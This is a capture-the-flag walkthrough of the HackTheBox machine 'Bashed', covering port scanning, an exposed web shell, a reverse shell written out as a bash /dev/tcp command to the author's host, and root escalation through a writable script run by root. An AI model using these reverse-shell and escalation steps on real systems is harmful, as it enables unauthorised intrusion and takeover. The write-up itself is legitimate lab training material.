Bashed

#Linux #Enumeration #Web-Fuzzing

Bashed is an easy-rated Linux machine from HackTheBox created by Arrexel. It is a weird machine that is open, making it pretty straightforward; you can enter there quickly and then escalate with something worth trying (I was lucky here). In the current post, my IP is 10.10.14.12, and the target’s IP is 10.129.148.58.

Gather Information

Local Terminal

nmap -sS -p- --open --min-rate 5000 -vvv -n -Pn 10.129.148.58

Only port 80? Just a website?

Local Terminal

nmap -sCV -p 80 10.129.148.58

Nothing special now

Local Terminal

nmap --script http-enum -p80 10.129.148.58

A lot of default directories

Add those directory to your notes, we will explore them soon. {Directories: /css/ /dev/ /images/ /js/ /php/ /uploads/}

Local Terminal

whatweb http://10.129.148.58

Nothing again.

Now we must check with our browser the structure of the website.

• Browser: http://10.129.148.58

http://10.129.148.58/single.html

Source code of single.html, we should save it in our directory list.

• Browser: http://10.129.148.58/css/

We can navigate through the folders, but there is nothing here

• Browser: http://10.129.148.58/dev/

Phpbash, what a curious name, let’s visit them.

• Browser: http://10.129.148.58/dev/phpbash.php

We have… a bash? This will save us a lot of work,

Exploitation

Time to use a reverse shell using our [BrowserTerm] at /dev/phpbash.php and a local terminal [Term]

Local Terminal

nc -nlvp 443

Browser Terminal

bash -c "bash -i >%26 /dev/tcp/10.10.14.12/443 0%261"

Now your local terminal [Term] is [www-data]

After this, we need a TTY Treatment to make it easier to work.

Target Terminal [www-data]

cd /
find \-name user.txt 2>/dev/null
cat user.txt

We have the first flag

Privileges Escalation

Target Terminal [www-data]

id
sudo -l
sudo -u scriptmanager whoami

We can use every command as “scriptmanager”? The user name is a clear clue, let’s change the user.

Target Terminal [www-data]

sudo -u scriptmanager bash

From [www-data] to [scriptman]

adasd

Target Term [ScriptManager]

id
sudo -l
uname -a
lsb_release -a

Searching for information, nothing relevant here. Our alternative is to follow the clue and go to scripts.

Target Term [ScriptManager]

ls
cd scripts

So, as scriptmanager we can read and write test.py, but root is modifying test.txt… How?

Target Term [ScriptManager]

nano test.py

New content of test.py

Target Term [ScriptManager]

cat test.txt

Wait, it changes? That means that is related to test txt, and root is executing test.py (Discovered with ls -la)

Target Term [ScriptManager]

nano test.py

Newest content of test.py, script to allow every user to use /bin/bash as root

Target Term [ScriptManager]

cat test.txt

We have the signal, perfect. That was worth to test

Target Term [ScriptManager]

bash -p

Target Terminal [root]

cat /root/root.txt